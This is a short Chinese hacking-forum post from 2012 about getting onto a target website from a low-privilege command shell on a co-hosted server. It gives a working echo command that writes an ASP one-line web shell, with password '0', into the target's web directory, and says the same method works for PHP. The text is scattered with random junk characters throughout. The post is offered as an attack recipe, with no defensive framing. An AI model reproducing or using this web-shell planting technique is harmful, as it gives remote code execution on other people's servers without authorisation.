在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。! o l; u X$ C) g# n) i
/ G1 t. p6 O' R) j/ F& i命令格式# i9 w5 }$ x) P* K& @; p7 @
) k$ X. c$ p# @0 i
Echo 语句 >目标站绝对目录
3 b* t2 G* v' [) x( G+ W. J6 ^1 W) e8 E2 z' @5 e: x, A
例如:
7 S7 y6 J1 R" g) ~+ k8 m9 ?$ ]" e( _& P
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
, c- v+ f' A: Q! P! i: L( ^1 M
% X8 C# ]2 i# O% `$ |7 ?这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
v& ?* _- y" F( @ |
发表于 2012-9-23 14:40:24
收藏
支持
反对